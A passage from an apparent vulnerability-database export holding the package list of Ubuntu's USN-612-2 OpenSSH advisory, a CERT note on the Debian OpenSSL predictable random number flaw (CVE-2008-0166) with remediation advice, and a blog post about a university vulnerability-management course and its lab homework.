http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.6p1-5ubuntu0.3.diff.gz\r\n Size/MD5: 195240 fe9c399991e5e754a0837760ff9d4100\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.6p1-5ubuntu0.3.dsc\r\n Size/MD5: 1169 fc9b6d0a04345973f1b88ca9aa8e6a32\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.6p1.orig.tar.gz\r\n Size/MD5: 946439 cee58cd226138191561fa2d484e18f49\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.6p1-5ubuntu0.3_all.deb\r\n Size/MD5: 1092 56a70a7d56d8d7722f33d60b6cd17a71\r\n http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/ssh-krb5_4.6p1-5ubuntu0.3_all.deb\r\n Size/MD5: 80578 9d3e66bfbbac576c23ee4bf9827ed545\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.3_amd64.udeb\r\n Size/MD5: 176410 3167e74074387dc17c98c38e1b98fd3c\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.3_amd64.deb\r\n Size/MD5: 746302 cc544fd8322a83dab8eb5f342eaca137\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.3_amd64.udeb\r\n Size/MD5: 193380 7defa55f2553fd71e391d33f392acd0e\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.3_amd64.deb\r\n Size/MD5: 268750 6d5c5179be8f291956b30cc36d4ee091\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.3_amd64.deb\r\n Size/MD5: 88726 97c9adfa3a82f9ed54286f68b41ef966\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.3_i386.udeb\r\n Size/MD5: 158796 e4d1cc24210b4a3327cafd41a559cd6b\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.3_i386.deb\r\n Size/MD5: 705630 c18488f740b38d1a57aef8806924de8a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.3_i386.udeb\r\n Size/MD5: 171690 af3ba10602d74429b54e256fbc982187\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.3_i386.deb\r\n Size/MD5: 249760 ab084428f73b76c5b4db1e648a222aa4\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.3_i386.deb\r\n Size/MD5: 88384 b051562fb7973c1dd92e6a8bb6b22854\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.3_lpia.udeb\r\n Size/MD5: 158876 1bffbee3eed3146e3feaa2c802537699\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.3_lpia.deb\r\n Size/MD5: 676546 d22322abdfa831ea95bf42540aafecd6\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.3_lpia.udeb\r\n Size/MD5: 171284 e59f9929f2fcc857d44131d76500c210\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.3_lpia.deb\r\n Size/MD5: 243102 8b5d5ff193b90fff85cec8aee1b8cfbc\r\n http://ports.ubuntu.com/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.3_lpia.deb\r\n Size/MD5: 88414 52ed9be1d8933742c15c14f7cfee11dd\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.3_powerpc.udeb\r\n Size/MD5: 180856 20b436d113f09e07b9c53301f87a551a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.3_powerpc.deb\r\n Size/MD5: 773758 b7c0f8ac855ea770bbdf58284f25546e\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.3_powerpc.udeb\r\n Size/MD5: 190236 23961af7588d4a886d818248c8c7fa15\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.3_powerpc.deb\r\n Size/MD5: 271988 e8bdf4fa9838997c0bd62446c59b38dd\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.3_powerpc.deb\r\n Size/MD5: 91094 b8756a6901f7a0337c36c7cc76d4991c\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.3_sparc.udeb\r\n Size/MD5: 166884 139dc1f86d43517a46ec3915b61125e1\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.3_sparc.deb\r\n Size/MD5: 758584 5b8cba657c6e53342e119d26dc9b7c61\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.3_sparc.udeb\r\n Size/MD5: 179096 0bccc7c29ed50a559b02e52087ae4ed2\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.3_sparc.deb\r\n Size/MD5: 276534 4a4ce6ed933a3c03f632e1b3a7f34e18\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.3_sparc.deb\r\n Size/MD5: 88696 a0158a6b98ff0531c1893caf4b01ebdf\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.7p1-8ubuntu1.1.diff.gz\r\n Size/MD5: 208492 b33a4acef918d79a2d0450011fd9db88\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.7p1-8ubuntu1.1.dsc\r\n Size/MD5: 1135 19ea91251f9de2f6dfa6d936a8e4025b\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.7p1.orig.tar.gz\r\n Size/MD5: 1009361 bea83d2e0f9ac7b3d4393d693e68b5c1\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.7p1-8ubuntu1.1_all.deb\r\n Size/MD5: 1084 ec75a470768ccd89eb6c107244d25843\r\n http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/ssh-krb5_4.7p1-8ubuntu1.1_all.deb\r\n Size/MD5: 88740 16ff461b87a6baa09ececbc9697af6ed\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.7p1-8ubuntu1.1_amd64.udeb\r\n Size/MD5: 179266 1e32b7dbecf022791c6ab251a8d86117\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.7p1-8ubuntu1.1_amd64.deb\r\n Size/MD5: 760430 1e6d3bdf27d9657c9eefeee0b5b6dd6f\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.7p1-8ubuntu1.1_amd64.udeb\r\n Size/MD5: 195488 267a48a1b35ab7855894e7785224dc57\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.7p1-8ubuntu1.1_amd64.deb\r\n Size/MD5: 272820 81b2527ce22794c0281484fdc1de86c1\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.7p1-8ubuntu1.1_amd64.deb\r\n Size/MD5: 96646 14c612c40c4c414eccf11db95e404a67\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.7p1-8ubuntu1.1_i386.udeb\r\n Size/MD5: 161826 a1081ddbc0d082133770cd8412774b01\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.7p1-8ubuntu1.1_i386.deb\r\n Size/MD5: 720024 3bcf4ba3a85f4464e13bb7d0b1574548\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.7p1-8ubuntu1.1_i386.udeb\r\n Size/MD5: 174336 77153868defe66100d1ab2d4949aed80\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.7p1-8ubuntu1.1_i386.deb\r\n Size/MD5: 254010 3ad390fe06cf32b5aced76ce944839ce\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.7p1-8ubuntu1.1_i386.deb\r\n Size/MD5: 96282 505e7cd7b1b5e8f9e8c2401e61b84f78\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-client-udeb_4.7p1-8ubuntu1.1_lpia.udeb\r\n Size/MD5: 161638 f14258648dc6485d895621c360caf87a\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-client_4.7p1-8ubuntu1.1_lpia.deb\r\n Size/MD5: 713374 176cceb970938c3d4e664c9ecdcafe8f\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-server-udeb_4.7p1-8ubuntu1.1_lpia.udeb\r\n Size/MD5: 174208 12e49f067940cc99cdd91037e415d57f\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-server_4.7p1-8ubuntu1.1_lpia.deb\r\n Size/MD5: 252862 4ff6983dfc76b1d9893c3eeac0da19b9\r\n http://ports.ubuntu.com/pool/main/o/openssh/ssh-askpass-gnome_4.7p1-8ubuntu1.1_lpia.deb\r\n Size/MD5: 96290 19ba2f10620c2565b41306d5392d86b9\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-client-udeb_4.7p1-8ubuntu1.1_powerpc.udeb\r\n Size/MD5: 185708 46e102bc1076e9b1efe01430e0424a14\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-client_4.7p1-8ubuntu1.1_powerpc.deb\r\n Size/MD5: 797090 4dc43223deedb0d4115a09d06cf352c3\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-server-udeb_4.7p1-8ubuntu1.1_powerpc.udeb\r\n Size/MD5: 194522 d7384655c312fcba85cd31efe4b4e0de\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-server_4.7p1-8ubuntu1.1_powerpc.deb\r\n Size/MD5: 279012 afc9f70d7df19d39ce61b7ee18e7040a\r\n http://ports.ubuntu.com/pool/main/o/openssh/ssh-askpass-gnome_4.7p1-8ubuntu1.1_powerpc.deb\r\n Size/MD5: 99064 f593634bf8755c8ef348457cd9478be9\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-client-udeb_4.7p1-8ubuntu1.1_sparc.udeb\r\n Size/MD5: 169976 450612c9a43ddf84d2dd97e2422a3b22\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-client_4.7p1-8ubuntu1.1_sparc.deb\r\n Size/MD5: 723070 f51ac3477b3a6554277ebb26ef6c2496\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-server-udeb_4.7p1-8ubuntu1.1_sparc.udeb\r\n Size/MD5: 181564 55312d8015761b003ca8abf6c6c0e6b5\r\n http://ports.ubuntu.com/pool/main/o/openssh/openssh-server_4.7p1-8ubuntu1.1_sparc.deb\r\n Size/MD5: 258334 c67396a961ca1baf4adb3dc60974fe8e\r\n http://ports.ubuntu.com/pool/main/o/openssh/ssh-askpass-gnome_4.7p1-8ubuntu1.1_sparc.deb\r\n Size/MD5: 96500 2ee312a10a8ff807ce94f8ecf0587588\r\n\r\n", "modified": "2008-05-14T00:00:00", "published": "2008-05-14T00:00:00", "id": "SECURITYVULNS:DOC:19843", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19843", "title": "[USN-612-2] OpenSSH vulnerability", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2019-10-09T19:50:30", "bulletinFamily": "info", "description": "### Overview \n\nA vulnerability in the OpenSSL package included with the Debian GNU/Linux operating system and its derivatives may cause weak cryptographic keys to be generated.\n\n### Description \n\nA weakness exists in the random number generator used by the OpenSSL package included with the Debian GNU/Linux operating system and derivative systems that causes the generated numbers to be predictable. As a result of this weakness, certain encryption keys are much more common than they should be. This vulnerability affects cryptographic applications that use keys generated by the flawed versions of the OpenSSL package. Affected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key material for use in X.509 certificates and session keys used in SSL/TLS connections. Any of these keys generated using the affected systems on or after 2006-09-17 may be vulnerable. Keys generated with GnuPG or GNUTLS on the affected systems are not vulnerable because these applications use their own random number generators and not the one from the flawed version of OpenSSL.\n\nNote that this vulnerability is specific to Debian, Ubuntu Linux and other Debian-derived operating systems. Other systems can be indirectly affected if weak keys generated by the vulnerable systems are imported into them. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker with minimal knowledge of the vulnerable system and the ability to conduct a brute force attack against an affected application may be able to guess secret key material. Secondary impacts include authenticated access to the system through the affected service or the ability to perform man-in-the-middle attacks. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor and regenerate key material** \n \nPatches have been release by the affected vendors. Users are encouraged to review the Systems Affected section of this document and apply the updates it refers to. \n \nDue to the nature of the flaw, any key material generated by the vulnerable versions of the OpenSSL package should be considered fatally defective. Additionally, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised since the Digital Signature Algorithm relies on a secret random value used during signature generation. After the software updates are applied, this key material must be regenerated with the updated version of the software. Vendor-specific instructions for doing this can also be found in the Systems Affected section of this document. \n \n--- \n \n### Vendor Information\n\n925211\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Debian GNU/Linux\n\nUpdated: May 15, 2008 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Debian project has published Debian Security Advisories [DSA-1571](<http://www.debian.org/security/2008/dsa-1571>) and [DSA-1576](<http://www.debian.org/security/2008/dsa-1576>) in response to this issue. Users are encouraged to review the advisories, apply the patches they refer to, then follow the [instructions for regenerating key material for applications](<http://www.debian.org/security/key-rollover/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23925211 Feedback>).\n\n### __ Ubuntu\n\nUpdated: May 15, 2008 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Ubuntu Project has published the following security advisories in response to this issue:\n\n * [USN-612-1](<http://www.ubuntu.com/usn/usn-612-1>)\n * [USN-612-2](<http://www.ubuntu.com/usn/usn-612-2>)\n * [USN-612-3](<http://www.ubuntu.com/usn/usn-612-3>)\n * [USN-612-4](<http://www.ubuntu.com/usn/usn-612-4>)\n * [USN-612-5](<http://www.ubuntu.com/usn/usn-612-5>)\n * [USN-612-6](<http://www.ubuntu.com/usn/usn-612-6>)\nUsers are encouraged to review the advisories, apply the patches they refer to, then follow any instructions they provide for regenerating key material for applications. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23925211 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.debian.org/security/2008/dsa-1571>\n * <http://www.debian.org/security/2008/dsa-1576>\n * <http://security.debian.org/project/extra/dowkd/dowkd.pl.gz>\n * <http://www.debian.org/security/key-rollover/>\n * <http://metasploit.com/users/hdm/tools/debian-openssl/>\n * <http://wiki.debian.org/SSLkeys>\n * <http://research.swtch.com/2008/05/lessons-from-debianopenssl-fiasco.html>\n * <http://www.links.org/?p=328>\n\n### Acknowledgements\n\nThanks to Florian Weimer of the Debian security team for reporting this vulnerability. Debian, in turn, credits Luciano Bello with discovering this issue.\n\nThis document was written by Chad R Dougherty.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-0166](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0166>) \n---|--- \n**Severity Metric:****** | 7.20 \n**Date Public:** | 2008-05-13 \n**Date First Published:** | 2008-05-15 \n**Date Last Updated: ** | 2008-06-03 13:30 UTC \n**Document Revision: ** | 12 \n", "modified": "2008-06-03T13:30:00", "published": "2008-05-15T00:00:00", "id": "VU:925211", "href": "https://www.kb.cert.org/vuls/id/925211", "type": "cert", "title": "Debian and Ubuntu OpenSSL packages contain a predictable random number generator", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "avleonov": [{"lastseen": "2019-05-29T14:19:28", "bulletinFamily": "blog", "description": "In the last three weeks, I participated in [Tinkoff Fintech School](<https://fintech.tinkoff.ru/tfschool/about>) - educational program for university students. Together with my colleagues, we prepared a three-month [practical Information Security course](<https://fintech.tinkoff.ru/tfschool/infsec>): 1 lecture per week with tests and home tasks. \n\nEach lecture is given by a member of our security team, specialized in one of the following modules: **Vulnerability Management**, Application Security, Infrastructure Security, Network Security, Virtualization Security, Banking Systems Security, Blue & Red-teaming, etc.\n\n[](<https://avleonov.com/wp-content/uploads/2019/03/vm_fintech.png>)\n\nThe course is still ongoing, but my Vulnerability Management module is over. Therefore, I want to share my impressions and some statistics.\n\n### Lecture\n\nThe content was pretty much the same as for [my lecture at MIPT ](<https://avleonov.com/2018/12/29/mipt-phystech-guest-lecture-vulnerabilities-money-and-people/>)in December last year. I removed some boring slides about Vulnerability Databases, added some [more critics of Vulnerability Management products](<https://avleonov.com/2018/12/21/guinea-pig-and-vulnerability-management-products/>), their [reports](<https://avleonov.com/2019/01/12/whats-wrong-with-patch-based-vulnerability-management-checks/>) and [detection methods](<https://avleonov.com/2019/02/11/no-left-boundary-for-vulnerability-detection/>). And I also updated information about [open vacancies](<https://avleonov.com/2019/02/04/open-positioner-my-new-project-for-tracking-it-and-security-jobs/>) related to Vulnerability Management.\n\n### Testing\n\nIn the beginning of each lecture, students should solve some tests based on the materials of the previous lecture. Basically it is for motivating them to visit lectures. \n\nI always wondered why Information Security tests are always so weird. They either check the knowledge of some terms or definitions invented by some nonames or the knowledge of reference data, the markings of fire extinguishers in the CISSP exam, for example. Or it is a fascinating game: guess the logic of the individual, who made this question. Anyway, it's far from the real life and the real practice. \n\nWell, I thought so until I had to make my own questions.  It turned out that it's pretty hard to make them unambiguous, reasonable and not based on the subjective experience. As a result, the questions were about Vulnerability Management process, [Vulnerability life cycle](<https://avleonov.com/2019/01/30/vulnerability-life-cycle-and-vulnerability-disclosures/>), [basic vulnerability types](<https://avleonov.com/2018/11/29/making-vulnerable-web-applications-xxs-rce-sql-injection-and-stored-xss-buffer-overflow/>), and Vulnerability Detection issues. All this were in the lecture. Many students answered all the questions correctly, so it seems to me that the test wasn't bad.\n\n### Homework\n\nAnd the most interesting and intriguing part was the homework. There were 2 tasks and the deadline was two weeks. \n\n#### Task 1. Vulnerability Detection and Exploitation\n\n_Deploy virtual machines in your home environment:_\n\n 1. _Vulnerable Target host (for example, Metasploitable or an old version of Windows/Linux)_\n 2. _Vulnerability Scanner (for example, Nessus Home, OpenVAS, Nexpose Community)_\n 3. _Exploitation Tool (for example, Metasploit or some separate exploits)_\n\n_Run vulnerable service on a Vulnerable Target host (for example, SSH), detect vulnerability with Vulnerability Scanner, exploit a vulnerability and get remote access to the host. Make a report how you did it step by step and describe each of your choices. _\n\n_Bonus: write your own detection script for the exploited vulnerability._\n\nIn this task I wanted the students to see \n\n * how the vulnerability could be detected and exploited;\n * that the Vulnerability Scanner is not some magical tool and they can make a small scanner on their own.\n\nThe task was intentionally formulated in a very wide way, without mentioning actual tools and vulnerabilities, because I was curious what exactly would they choose. So, those who are not really interested in the topic could choose something easy, and those who like this stuff could use this task to make an interesting research. \n\nMost of the students chose Metasploitable as a vulnerable target host. Actually, this is the easiest way. But, as you can see, some students chose the usual operating systems: Windows, Ubuntu Linux and docker containers.\n\n\n\nThe same number of students used [Nessus Home](<https://avleonov.com/2016/05/16/tenable-nessus-registration-installation-scanning-reporting/>) and OpenVAS for vulnerability detection. They registered Nessus Home on their own and used it at home environment, so the license agreement was not violated.\n\n\n\nIn most cases students used Metasploit for exploitation. But sometimes it were some custom python scripts or just a curl.\n\n\n\nThey exploited very different vulnerabilities: \n\n\n\n 1. BID:48539 - vsftpd Compromised Source Packages Backdoor Vulnerability \n\n 2. CVE-2004-2687 - DistCC Daemon Command Execution \n 3. CVE-2007-2447 - Samba \"username map script\" Command Execution\n 4. CVE-2008-0166 - Predictable PRNG Brute Force SSH\n 5. CVE-2010-2075 - UnrealIRCD 3.2.8.1 Backdoor Command Execution\n 6. CVE-2015-1427 - Elasticsearch Search Groovy Sandbox Bypass\n 7. **CVE-2017-12617 - Apache Tomcat JSP Upload Bypass / Remote Code Execution**\n 8. CVE-2017-9462 - Mercurial Custom hg-ssh Wrapper Remote Code Exec\n 9. **CVE-2019-0724 - Microsoft Exchange Server Remote Privilege Escalation Vulnerability**\n 10. Distributed Ruby - Distributed Ruby Remote Code Execution\n 11. MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution\n 12. **MS17-010 - Remote code execution in Microsoft Server Message Block 1.0 (SMBv1) server (EternalBlue)**\n 13. ssh bruteforce - brute-force guess SSH login credentials\n\nI liked the most exploitation of Apache Tomcat RCE (in a docker image), [classical MS17-010](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>) and new [Microsoft Exchange Server issue](<https://www.tenable.com/blog/proof-of-concept-code-gives-standard-microsoft-exchange-users-domain-administrator-privileges>), because these are the most practical cases. The bruteforce of SSH logins and passwords was not the exploitation that was expected in this task, but why not, this also often happens. \n\nAnd finally the detection scripts. Most of them were unauthenticated and version-based, written in python or bash.\n\n\n\n#### Task 2. Vulnerability Scoring\n\n_Find a new CVE vulnerability without a CVSS vector on _[_nvd.nist.gov_](<https://nvd.nist.gov/>)_ (\"UNDERGOING ANALYSIS\" state) and make CVSS v.3 Base and Temporal Vector for it. Justify your choice. It is advisable to pass the task before the vector will be published on the NVD website._\n\nIn this task I wanted students to see how the criticality of a vulnerability (that Vulnerability Scanner shows) is actually being produced. The vector was not really matter. In fact, it was possible to get Base Vector from the original vulnerability research.  The important part was the justification like \"I chose Attack Vector (AV): Network because\u2026\" just to be seen that this is not a random choice. \n\nAs you can see, very few people take the same vulnerabilities, that is definitely a good sign:\n\n\n\nIt also might be interesting to compare the vector that they've got as a result of this task with the vector from the NVD. Most likely there will the differences because CVSS is pretty subjective. \n\n### In conclusion\n\nThis was my second time when I gave a lecture and the first time I made additional educational content: tests and homework. It was very cool and exciting. I hope the students have their fun too. \n\nThis was only the first module, there is still a lot of content and interesting practical tasks from my colleagues. I hope that all the students will successfully go through all the stages and with some of them we will meet at work or on internship.\n\n", "modified": "2019-03-04T10:38:31", "published": "2019-03-04T10:38:31", "id": "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F", "href": "http://feedproxy.google.com/~r/avleonov/~3/VfGsxXaJTBs/", "type": "avleonov", "title": "Vulnerability Management at Tinkoff Fintech School", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}